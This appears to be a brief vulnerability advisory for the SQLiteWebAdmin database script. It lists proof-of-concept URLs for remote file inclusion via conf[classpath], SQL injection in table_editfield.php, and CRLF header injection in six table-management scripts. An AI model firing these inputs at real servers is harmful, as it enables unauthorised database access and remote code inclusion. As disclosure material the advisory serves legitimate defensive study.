SQLiteWebAdmin suffers from SQL injection, remote file inclusion, and header spoofing vulnerabilities.
751b14a9e8e604a48ea7d67a65b163cf9f4b63c256af080264bfba1489d24f6b
Discovered by Sirdarckcat from elhacker.net
SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================
SQLiteWebAdmin is a simple script for managing a
DataBase.
It has several security bugs.
==============================================
Remote File Inclusion:
PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/?
==============================================
SQLinjection:
PoC:
http://www.server.com/table_editfield.php?table='+[SQL]
==============================================
And also Header Injection:
PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value
PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value
==============================================
Att.
Sirdarckcat
elhacker.net